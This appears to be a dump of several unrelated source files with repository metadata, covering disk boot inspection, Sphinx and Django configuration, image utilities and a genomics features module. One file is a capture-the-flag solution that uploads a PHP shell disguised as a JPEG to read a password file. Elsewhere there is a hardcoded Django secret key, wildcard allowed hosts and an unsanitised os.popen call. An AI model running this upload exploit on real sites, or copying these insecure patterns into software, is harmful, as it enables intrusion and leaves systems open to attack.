fs = boot_inspect.system.filesystems.GuestFSFilesystem(g)
operating_system = linux.Inspector(fs, _LINUX).inspect()
if not operating_system:
operating_system = windows.Inspector(g, root).inspect()
if operating_system:
operating_system.architecture = architecture.Inspector(g, root).inspect()
g.umount_all()
return inspect_pb2.InspectionResults(
os_release=operating_system,
os_count=1 if operating_system else 0,
)
def inspect_boot_loader(g, device) -> inspect_pb2.InspectionResults:
"""Finds boot-loader properties for the device using offline inspection.
Args:
g (guestfs.GuestFS): A launched, but unmounted, GuestFS instance.
device: a reference to a mounted block device (eg: /dev/sdb), or
to a virtual disk file (eg: /opt/images/disk.vmdk).
Example:
g = guestfs.GuestFS(python_return_dict=True)
g.add_drive_opts("/dev/sdb", format="raw")
g.launch()
results = inspect_boot_loader(g)
"""
bios_bootable = False
uefi_bootable = False
root_fs = ""
try:
stream = os.popen('gdisk -l {}'.format(device))
output = stream.read()
print(output)
if _inspect_for_hybrid_mbr(output):
bios_bootable = True
part_list = g.part_list('/dev/sda')
for part in part_list:
try:
guid = g.part_get_gpt_type('/dev/sda', part['part_num'])
# It covers both GPT "EFI System" and BIOS "EFI (FAT-12/16/32)".
if guid == 'C12A7328-F81F-11D2-BA4B-00A0C93EC93B':
uefi_bootable = True
# TODO: detect root_fs (b/169245755)
# It covers "BIOS boot", which make a protective-MBR bios-bootable.
if guid == '21686148-6449-6E6F-744E-656564454649':
bios_bootable = True
except Exception:
continue
except Exception as e:
print("Failed to inspect disk partition: ", e)
return inspect_pb2.InspectionResults(
bios_bootable=bios_bootable,
uefi_bootable=uefi_bootable,
root_fs=root_fs,
)
def _inspect_for_hybrid_mbr(gdisk_output) -> bool:
"""Finds hybrid MBR, which potentially is BIOS bootableeven without a BIOS
boot partition.
Args:
gdisk_output: output from gdisk that contains partition info.
"""
is_hybrid_mbr = False
mbr_bios_bootable_re = re.compile(r'(.*)MBR:[\s]*hybrid(.*)', re.DOTALL)
if mbr_bios_bootable_re.match(gdisk_output):
is_hybrid_mbr = True
return is_hybrid_mbr
def _linux_inspector(
fs: boot_inspect.system.filesystems.Filesystem) -> linux.Inspector:
"""Returns a linux.Inspector that is configured
with all detectable Linux distros.
"""
return linux.Inspector(fs, _LINUX)
| 33.342995 | 78 | 0.687627 |
4a1f57db4929e392386256739d393287c1d608fd | 339 | py | Python | nodes/0.7.x/python/RoomSequence.ToDoorSequence.py | jdehotin/Clockworkfordynamo | 59226ea8292c57acfa1aa476efd40f0e78c9b965 | [
"MIT"
] | 147 | 2016-02-24T16:37:03.000Z | 2022-02-18T12:10:34.000Z | nodes/0.7.x/python/RoomSequence.ToDoorSequence.py | jdehotin/Clockworkfordynamo | 59226ea8292c57acfa1aa476efd40f0e78c9b965 | [
"MIT"
] | 269 | 2016-02-25T14:04:14.000Z | 2022-03-26T07:30:53.000Z | nodes/0.7.x/python/RoomSequence.ToDoorSequence.py | jdehotin/Clockworkfordynamo | 59226ea8292c57acfa1aa476efd40f0e78c9b965 | [
"MIT"
] | 89 | 2016-03-16T18:21:56.000Z | 2022-02-03T14:34:30.000Z | import clr
rooms = IN[0]
doors = IN[1]
fromroom = IN[2]
toroom = IN[3]
elementlist = list()
i = 0
while i < (len(rooms)-1):
j = 0
while j < len(doors):
if (rooms[i] == fromroom[j] and rooms[i+1] == toroom[j]) or (rooms[i+1] == fromroom[j] and rooms[i] == toroom[j]):
elementlist.append(doors[j])
j += 1
i += 1
OUT = elementlist | 19.941176 | 116 | 0.59587 |
4a1f5a23a977994e6019bb7f5ebbd7dff7a1e4da | 2,048 | py | Python | docs/conf.py | arpitshahi227/browser-history | 4a84a2dbd5a5a05eea1b0d167d723cd518a0f3f4 | [
"Apache-2.0"
] | null | null | null | docs/conf.py | arpitshahi227/browser-history | 4a84a2dbd5a5a05eea1b0d167d723cd518a0f3f4 | [
"Apache-2.0"
] | 27 | 2021-05-10T09:52:18.000Z | 2022-03-28T15:10:56.000Z | docs/conf.py | arpitshahi227/browser-history | 4a84a2dbd5a5a05eea1b0d167d723cd518a0f3f4 | [
"Apache-2.0"
] | null | null | null | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath(".."))
# -- Project information -----------------------------------------------------
project = "browser-history"
copyright = "2020, Samyak Sarnayak"
author = "Samyak Sarnayak"
# The full version, including alpha/beta/rc tags
release = "0.3.1"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx_autodoc_typehints",
"sphinx_rtd_theme",
"sphinxarg.ext",
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
| 33.57377 | 79 | 0.665527 |
4a1f5a6a58568754cf5ce8eb196568f21b29acc3 | 3,783 | py | Python | djangoecommerce/settings.py | ThalesLeal/appdjangoecommercee | 816f31117996c23d87d224f3eebe1195ee215400 | [
"CC0-1.0"
] | null | null | null | djangoecommerce/settings.py | ThalesLeal/appdjangoecommercee | 816f31117996c23d87d224f3eebe1195ee215400 | [
"CC0-1.0"
] | null | null | null | djangoecommerce/settings.py | ThalesLeal/appdjangoecommercee | 816f31117996c23d87d224f3eebe1195ee215400 | [
"CC0-1.0"
] | null | null | null | """
Django settings for djangoecommerce project.
Generated by 'django-admin startproject' using Django 1.9.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-uhpfb-=5&l!s0h5sn8*(3a^slvqng24z7b$0yt!a8w+2*$m9#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['appdjangoecommercee.herokuapp.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
'catalog',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'djangoecommerce.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
# apps
'catalog.context_processors.categories',
],
},
},
]
WSGI_APPLICATION = 'djangoecommerce.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'America/Recife'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
ALLOWED_HOSTS = ['*']
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
try:
from .local_settings import *
except ImportError:
pass | 27.215827 | 91 | 0.706846 |
4a1f5a7a8d3c5c086af3980e035ec9048052d3fa | 586 | py | Python | glue/__init__.py | brean/arduino-kivy-bluetooth | 651126e11e6d44723a07609234e976f93a8084a1 | [
"MIT"
] | 13 | 2016-05-13T05:59:55.000Z | 2022-01-07T00:05:57.000Z | glue/__init__.py | brean/arduino-kivy-bluetooth | 651126e11e6d44723a07609234e976f93a8084a1 | [
"MIT"
] | null | null | null | glue/__init__.py | brean/arduino-kivy-bluetooth | 651126e11e6d44723a07609234e976f93a8084a1 | [
"MIT"
] | 4 | 2016-11-01T06:22:56.000Z | 2020-02-09T17:45:48.000Z | # -*- coding: utf-8 -*-
"""
board connection - provide classes to connect to some robotic board like arduino or raspberry py
directly via bluetooth or over TCP/IP
"""
from glue.protocols import protocols
from glue.systems import systems
def connect(data):
"""
connect to system using protocol
:param data: data that describes system and protocol
"""
protocol_data = data['protocol']
protocol = protocols[protocol_data['name']](protocol_data)
system_data = data['system']
system = systems[system_data['name']](protocol, system_data)
return system | 26.636364 | 96 | 0.713311 |
4a1f5a9246076d38e2117c7da17d6009350304ed | 31 | py | Python | thermo-env/lib/python3.5/keyword.py | ndebuhr/thermoModelingAlpha | 9e1a0f9ac4caabf386c1e3103ec69f269131a6b9 | [
"MIT"
] | 4 | 2017-09-24T21:30:46.000Z | 2019-06-01T13:37:44.000Z | thermo-env/lib/python3.5/keyword.py | ndebuhr/thermo-state-solver | 9e1a0f9ac4caabf386c1e3103ec69f269131a6b9 | [
"MIT"
] | 19 | 2020-01-28T21:41:50.000Z | 2022-03-11T23:17:39.000Z | thermo-env/lib/python3.5/keyword.py | ndebuhr/thermo-state-solver | 9e1a0f9ac4caabf386c1e3103ec69f269131a6b9 | [
"MIT"
] | null | null | null | /usr/lib64/python3.5/keyword.py | 31 | 31 | 0.806452 |
4a1f5bb8cfd7f227ca1a6938ea727fac348b970d | 388 | py | Python | instance/models.py | devopsconsulting/webvirtmgr | cc35978cae4a1a53b93056df946896ae992fe176 | [
"Apache-2.0"
] | 1 | 2019-07-16T20:32:44.000Z | 2019-07-16T20:32:44.000Z | instance/models.py | normaldotcom/webvirtmgr | 8d822cb94105abf82eb0ff6651a36c43b0911d2a | [
"Apache-2.0"
] | null | null | null | instance/models.py | normaldotcom/webvirtmgr | 8d822cb94105abf82eb0ff6651a36c43b0911d2a | [
"Apache-2.0"
] | null | null | null | from django.db import models
from servers.models import Compute
class Instance(models.Model):
compute = models.ForeignKey(Compute)
name = models.CharField(max_length=20)
uuid = models.CharField(max_length=36)
# display_name = models.CharField(max_length=50)
# display_description = models.CharField(max_length=255)
def __unicode__(self):
return self.name
| 27.714286 | 59 | 0.742268 |
4a1f5bbc5a9ce98718c82f8f783b65f3e5e2860d | 1,395 | py | Python | kornia/utils/misc.py | Ishticode/kornia | 974abb43ec72d12dbd244a2fb247bbbab8498de0 | [
"ECL-2.0",
"Apache-2.0"
] | 418 | 2018-10-02T22:31:36.000Z | 2019-01-16T14:15:45.000Z | kornia/utils/misc.py | Ishticode/kornia | 974abb43ec72d12dbd244a2fb247bbbab8498de0 | [
"ECL-2.0",
"Apache-2.0"
] | 94 | 2019-01-17T22:10:45.000Z | 2019-05-22T23:47:58.000Z | kornia/utils/misc.py | Ishticode/kornia | 974abb43ec72d12dbd244a2fb247bbbab8498de0 | [
"ECL-2.0",
"Apache-2.0"
] | 25 | 2018-10-02T22:50:04.000Z | 2019-01-13T18:14:11.000Z | import torch
def eye_like(n: int, input: torch.Tensor) -> torch.Tensor:
r"""Return a 2-D tensor with ones on the diagonal and zeros elsewhere with the same batch size as the input.
Args:
n: the number of rows :math:`(N)`.
input: image tensor that will determine the batch size of the output matrix.
The expected shape is :math:`(B, *)`.
Returns:
The identity matrix with the same batch size as the input :math:`(B, N, N)`.
"""
if n <= 0:
raise AssertionError(type(n), n)
if len(input.shape) < 1:
raise AssertionError(input.shape)
identity = torch.eye(n, device=input.device, dtype=input.dtype)
return identity[None].repeat(input.shape[0], 1, 1)
def vec_like(n, tensor):
r"""Return a 2-D tensor with a vector containing zeros with the same batch size as the input.
Args:
n: the number of rows :math:`(N)`.
tensor: image tensor that will determine the batch size of the output matrix.
The expected shape is :math:`(B, *)`.
Returns:
The vector with the same batch size as the input :math:`(B, N, 1)`.
"""
if n <= 0:
raise AssertionError(type(n), n)
if len(tensor.shape) < 1:
raise AssertionError(tensor.shape)
vec = torch.zeros(n, 1, device=tensor.device, dtype=tensor.dtype)
return vec[None].repeat(tensor.shape[0], 1, 1)
| 31.704545 | 112 | 0.630824 |
4a1f5e3fc7a89703c5296d8f776563475183499a | 3,516 | py | Python | level_13.py | katsukaree/chapter-weasel | fa9a6c890eb6bca1f25dd89a97ef10ea7b62c2b7 | [
"MIT"
] | null | null | null | level_13.py | katsukaree/chapter-weasel | fa9a6c890eb6bca1f25dd89a97ef10ea7b62c2b7 | [
"MIT"
] | null | null | null | level_13.py | katsukaree/chapter-weasel | fa9a6c890eb6bca1f25dd89a97ef10ea7b62c2b7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import requests
import base64
import re
import tempfile
import urllib.parse
from bs4 import BeautifulSoup
from levels_credentials import credentials, folder
level_url = credentials[13]["url"]
level_username = credentials[13]["level"]
level_password = credentials[13]["password"]
next_level_url = credentials[14]["url"]
next_level_username = credentials[14]["level"]
next_level_pass = folder + next_level_username
credentials = "%s:%s" % (level_username, level_password)
auth_creds = base64.b64encode(credentials.encode("ascii"))
heads = {"Authorization": "Basic %s" % auth_creds.decode("ascii")}
basic_file = b"""\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07\x07\t\t\x08\n\x0c\x14\r\x0c\x0b\x0b\x0c\x19\x12\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c $.\' ",#\x1c\x1c(7),01444\x1f\'9=82<.342\xff\xdb\x00C\x01\t\t\t\x0c\x0b\x0c\x18\r\r\x182!\x1c!22222222222222222222222222222222222222222222222222\xff\xc0\x00\x11\x08\x00\x01\x00\x01\x03\x01"\x00\x02\x11\x01\x03\x11\x01\xff\xc4\x00\x1f\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\xff\xc4\x00\xb5\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00\x01}\x01\x02\x03\x00\x04\x11\x05\x12!1A\x06\x13Qa\x07"q\x142\x81\x91\xa1\x08#B\xb1\xc1\x15R\xd1\xf0$3br\x82\t\n\x16\x17\x18\x19\x1a%&\'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xc4\x00\x1f\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\xff\xc4\x00\xb5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01\x02w\x00\x01\x02\x03\x11\x04\x05!1\x06\x12AQ\x07aq\x13"2\x81\x08\x14B\x91\xa1\xb1\xc1\t#3R\xf0\x15br\xd1\n\x16$4\xe1%\xf1\x17\x18\x19\x1a&\'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00?\x00\xf7\xfa(\xa2\x80?\xff\xd9"""
payload = b'<?php $myfile = fopen("../../../../../../../..%s", "r"); echo fgets($myfile); fclose($myfile); ?>' % next_level_pass.encode("ascii")
spiked_file = basic_file + payload
initial_response = requests.get(level_url, headers=heads)
initial_page = BeautifulSoup(initial_response.text, 'html.parser')
hidden_filename = initial_page.find_all("input")[1].get("value")
filename_list = re.split("\.", hidden_filename)
with tempfile.NamedTemporaryFile(prefix=filename_list[0], suffix=".php") as fp:
fp.write(spiked_file)
fp.seek(0)
files = {"uploadedfile": fp}
next_data = {"MAX_FILE_SIZE": "1000", "filename":"%s.php" % filename_list[0]}
next_response = requests.post(level_url, headers=heads, files=files, data=next_data)
next_response_parsed = BeautifulSoup(next_response.text, 'html.parser')
evil_file = next_response_parsed.find_all("a")[0].get("href")
evil_file_path = level_url + evil_file
next_pass = requests.get(evil_file_path, headers=heads)
print(next_pass.text.strip()[-32::])
| 74.808511 | 1,872 | 0.742036 |
4a1f6028964148dcc46c1ff12bbb3ff8d2b421b7 | 1,159 | py | Python | relocate_xaltjson.py | adityakavalur/slurm-docker-cluster | d54703ddcab9d456be4743dae0f51daf3d549df5 | [
"MIT"
] | null | null | null | relocate_xaltjson.py | adityakavalur/slurm-docker-cluster | d54703ddcab9d456be4743dae0f51daf3d549df5 | [
"MIT"
] | null | null | null | relocate_xaltjson.py | adityakavalur/slurm-docker-cluster | d54703ddcab9d456be4743dae0f51daf3d549df5 | [
"MIT"
] | null | null | null | import grp
import pwd
import os
import json
import fnmatch
from glob import glob
org_dir="/data/xalt2_json"
reloc_dir="/data/xalt2_json_moved"
xalt_dir=glob(org_dir+"/*")
user=pwd.getpwuid(os.getuid()).pw_uid
#move dir at the end of the run
for slurmjobs in xalt_dir:
stat_info = os.stat(slurmjobs)
uid = stat_info.st_uid
if (uid == user):
slurmjobs2=slurmjobs+"/*"
xalt2list=glob(slurmjobs2)
for job2 in xalt2list:
movefile = False
with open(job2) as json_file:
data = json.load(json_file)
if 'userT' in data:
if data["userT"]["job_id"] == os.environ.get('SLURM_JOBID') :
movefile = True
if (movefile):
xaltnum=slurmjobs
xaltnum=slurmjobs.replace(org_dir,'')
if not os.path.exists(reloc_dir+xaltnum):
os.makedirs(reloc_dir+xaltnum)
moveddir = job2.replace(org_dir,reloc_dir)
os.replace(job2,moveddir)
#This needs to be done elsewhere
##delete empty folders
#for slurmjobs in xalt_dir:
# print(len(fnmatch.filter(os.listdir(slurmjobs), '*.json')))
| 28.268293 | 76 | 0.623814 |
4a1f60f66c03890564d050fd681dadc2f607e8f5 | 37,267 | py | Python | veppy/features.py | solvebio/veppy | 75d581d562a6d50fd6181b2870feda26ff50115c | [
"MIT"
] | 13 | 2016-10-04T19:41:48.000Z | 2021-01-14T15:38:28.000Z | veppy/features.py | solvebio/veppy | 75d581d562a6d50fd6181b2870feda26ff50115c | [
"MIT"
] | 7 | 2016-10-05T18:58:50.000Z | 2020-07-15T13:01:07.000Z | veppy/features.py | solvebio/veppy | 75d581d562a6d50fd6181b2870feda26ff50115c | [
"MIT"
] | 5 | 2016-10-05T12:51:32.000Z | 2016-11-14T19:26:28.000Z | import sys
import re
import logging
from intervaltree import IntervalTree
from bisect import bisect
from collections import defaultdict, namedtuple
from . import errors
logger = logging.getLogger('veppy')
def intersects(start0, stop0, start1, stop1):
return \
overlaps(start0, stop0, start1, stop1) or \
contains(start1, stop1, start0, stop0)
def overlaps(start0, stop0, start1, stop1):
return start0 <= stop1 and stop0 >= start1
def contains(start0, stop0, start1, stop1):
return start0 >= start1 and stop0 <= stop1
def contains_point(coord, start1, stop1):
return contains(coord, coord, start1, stop1)
class Feature(object):
def __init__(self, chromosome, start, stop, strand, frame,
info={}, genome_build='GRCh37'):
self.chromosome = chromosome
self.start = start
self.stop = stop
self.strand = strand
self.frame = frame
self.info = info
self.genome_build = genome_build
@property
def length(self):
return self.stop - self.start + 1
def overlaps(self, feature):
return overlaps(feature.start, feature.stop, self.start, self.stop)
def contains(self, feature):
return contains(feature.start, feature.stop, self.start, self.stop)
def intersects(self, feature):
return intersects(feature.start, feature.stop, self.start, self.stop)
# override these methods to define custom sorting/comparator
def __eq__(self, feature):
return \
self.__class__ == feature.__class__ and \
self.chromosome == feature.chromosome and \
self.start == feature.start and \
self.stop == feature.stop
def __ne__(self, obj):
return not self.__eq__(obj)
def __gt__(self, obj):
return self.start > obj.start
def __lt__(self, obj):
return self.start < obj.start
def __str__(self):
return \
'feature: %s, chromosome: %s, coordinates: [%s, %s]' % \
(self.__class__.__name__, self.chromosome, self.start, self.stop)
def __repr__(self):
return str(self)
def to_dict(self):
return {
'chromosome': self.chromosome,
'start': self.start,
'stop': self.stop,
'strand': self.strand
}
class VepSpliceAcceptorJunction(Feature):
# defined in accordance with standard VEP definition:
# spans from [-8 bp, 3 bp] ([-3bp, 8bp]) of intron/exon (exon/intron)
# boundary
def __init__(self, transcript, intron):
chromosome = transcript.chromosome
strand = transcript.strand
frame = None
if strand == '+':
start = intron.stop - 7
stop = intron.stop + 3
self.splice_acceptor = \
Feature(
chromosome,
intron.stop - 1,
intron.stop,
strand,
frame
)
else:
start = intron.start - 3
stop = intron.start + 7
self.splice_acceptor = \
Feature(
chromosome,
intron.start,
intron.start + 1,
strand,
frame
)
super(VepSpliceAcceptorJunction, self).__init__(
chromosome, start, stop, strand, frame)
class VepSpliceDonorJunction(Feature):
# defined in accordance with standard VEP definition:
# spans from [-8 bp, 3 bp] ([-3bp, 8bp]) of intron/exon (exon/intron)
# boundary
def __init__(self, transcript, intron):
chromosome = transcript.chromosome
strand = transcript.strand
frame = None
if strand == '+':
start = intron.start - 3
stop = intron.start + 7
self.splice_donor = \
Feature(
chromosome,
intron.start,
intron.start + 1,
strand,
frame
)
else:
start = intron.stop - 7
stop = intron.stop + 3
self.splice_donor = \
Feature(
chromosome,
intron.stop - 1,
intron.stop,
strand,
frame
)
super(VepSpliceDonorJunction, self).__init__(
chromosome, start, stop, strand, frame)
class ParentFeature(Feature):
def __init__(self, *args, **kwargs):
self.feature_trees = defaultdict(IntervalTree)
self._built = False
super(ParentFeature, self).__init__(*args, **kwargs)
def to_dict(self):
d = super(ParentFeature, self).to_dict()
d['id'] = self.id
return d
@property
def id(self):
return self.info.get(self.id_field)
# check ID for equality as well
def __eq__(self, feature):
return super(ParentFeature, self) == feature and \
self.id == feature.id
def has(self, feature_type):
return len(self.feature_trees[feature_type]) > 0
def first(self, feature_type):
tree = self.feature_trees[feature_type]
leaf = (list(tree[tree.begin()]) or [None])[0]
return leaf.data if leaf else None
def last(self, feature_type):
tree = self.feature_trees[feature_type]
leaf = (list(tree[tree.end() - 1]) or [None])[0]
return leaf.data if leaf else None
def add_feature(self, feature_type, feature):
self.feature_trees[feature_type]\
.addi(feature.start, feature.stop + 1, feature)
def get_features(self, feature_type):
# TODO: calling sorted every time we request a feature list
# could be pretty expensive...
return sorted(
[x.data for x in self.feature_trees[feature_type].items()]
)
def find_overlapping(self, feature_type, variant, first=True):
start = variant.effective_variant.start
stop = variant.effective_variant.stop
features = \
[l.data for l in
self.feature_trees[feature_type.lower()][start:stop + 1]]
if first:
return (features or [None])[0]
else:
return features
def find_overlapping2(self, feature_type, variant, first=True):
# TODO: do we **really** just want to return the first?
feature_array = self.feature_trees[feature_type.lower()]
if len(feature_array) == 0:
return None
i = bisect(feature_array, variant)
_features = []
for j in {max(i - 1, 0), min(i, len(feature_array) - 1)}:
feature = feature_array[j]
if overlaps(
variant.effective_variant.start,
variant.effective_variant.stop,
feature.start + (1 if variant.is_insertion else 0),
feature.stop
):
_features.append(feature)
elif len(_features) > 0:
break
if first:
return None if not _features else _features[0]
else:
return _features
# wrapper method to safely build transcripts.
# e.g. does not build correctly for SeqGene v.104 b/c of invalid,
# overlapping exons
def build(self, data, force=False):
if self._built and not force:
return
try:
self._build(data, force=force)
# assign numbers to exons, introns and cdses
for feature_type in ['exon', 'intron']:
features = self.get_features(feature_type)[::1 if self.strand == '+' else -1] # noqa
for (i, feature) in enumerate(features):
# start counting at 1!
feature.number = i + 1
feature.total = len(features)
except Exception, e:
logger.warn('Invalid feature %s' % self)
logger.warn(e)
self.errors = True
def __str__(self):
return \
'feature: %s, %s, chromosome: %s, coordinates: [%s, %s]' % \
(
self.__class__.__name__,
self.id,
self.chromosome,
self.start,
self.stop
)
class DefaultFeatureMixin(object):
default = False
class Gene(DefaultFeatureMixin, ParentFeature):
transcripts = None
@property
def symbol(self):
return self.info.get(self.symbol_field)
class EnsemblGene(Gene):
feature = 'gene'
id_field = 'gene_id'
symbol_field = 'gene_name'
class GencodeGene(EnsemblGene):
pass
class NcbiGene(Gene):
feature = 'GENE'
id_field = 'gene_id'
symbol_field = 'gene_name'
class Transcript(DefaultFeatureMixin, ParentFeature):
errors = False
protein_id = None
CodingOffset = \
namedtuple(
'CodingOffset',
[
'coding_offset',
'coding_length'
]
)
CodingRange = \
namedtuple(
'CodingRange',
[
'coding_start',
'coding_stop',
'intronic_offset_start',
'intronic_offset_stop'
]
)
GenomicRange = \
namedtuple(
'GenomicRange',
[
'start',
'stop'
]
)
@property
def accession_number(self):
# from ENST123456.78, return ENST123456
return self.id.split('.', 1)[0]
@property
def accession_int(self):
# from ENST123456.78, return 123456 as int
# strips all non-digits from string and returns as int
return int(re.sub(r"\D", "", self.id.split('.', 1)[0]))
@property
def accession_version(self):
# from ENST123456.78, return 78
if '.' in self.id:
return int(self.id.rsplit('.', 1)[-1])
return 0
@property
def gene_id(self):
return self.info.get(self.gene_id_field)
@property
def exons(self):
return self.get_features('exon')
@property
def coding_sequences(self):
return self.get_features('cds')
@property
def untranslated_regions(self):
return self.get_features('utr')
@property
def introns(self):
return self.get_features('intron')
@property
def is_coding(self):
return bool(self.coding_sequences)
@property
def coding_start(self):
return self.first('cds').start
@property
def coding_stop(self):
# TODO: fix this to use 'stop_codon' if it exists...
return self.last('cds').stop
@property
def coding_offsets(self):
return getattr(self, '_coding_offsets', None)
# Coordinate Translator
@property
def coordinate_translator(self):
if not hasattr(self, '_coordinate_translator'):
self._coordinate_translator = \
Transcript.CoordinateTranslator(
self.exons,
self.introns,
self.strand,
self.coding_offsets.coding_offset,
self.coding_offsets.coding_length
)
return self._coordinate_translator
class CoordinateTranslator(object):
class Leaf(object):
def __init__(self, feature, coding_start, coding_stop):
self.feature = feature
self.start = feature.start
self.stop = feature.stop
self.coding_start = coding_start
self.coding_stop = coding_stop
def __str__(self):
return 'genomic: [%s, %s], coding: [%s, %s]' % (
self.start, self.stop, self.coding_start, self.coding_stop
)
def __init__(
self, exons, introns, strand, coding_offset, coding_length):
self.strand = strand
self.coding_offset = coding_offset
self.coding_length = coding_length
self._exon_tree = IntervalTree()
self._intron_tree = IntervalTree()
self._genomic_tree = IntervalTree()
_coding_start = -self.coding_offset
for exon in (exons if self.strand == '+' else exons[::-1]):
leaf = Transcript.CoordinateTranslator.Leaf(
exon,
_coding_start,
_coding_start + exon.length - 1
)
self._genomic_tree.addi(leaf.start, leaf.stop + 1, leaf)
self._exon_tree.addi(
leaf.coding_start, leaf.coding_stop + 1, leaf)
# increment
_coding_start = leaf.coding_stop + 1
for intron in introns:
# introns don't have coding coordinates, so use those of
# adjacent exons
leaf_genomic_upstream = \
list(self._genomic_tree[intron.start - 1])[0].data
leaf_genomic_downstream = \
list(self._genomic_tree[intron.stop + 1])[0].data
# NOTE: always assemble intronic offsets w.r.t. to the
# 'coding stop' position of the upstream CDS
if self.strand == '+':
leaf = \
Transcript.CoordinateTranslator.Leaf(
intron,
leaf_genomic_upstream.coding_stop,
leaf_genomic_downstream.coding_start
)
else:
leaf = \
Transcript.CoordinateTranslator.Leaf(
intron,
leaf_genomic_downstream.coding_stop,
leaf_genomic_upstream.coding_start
)
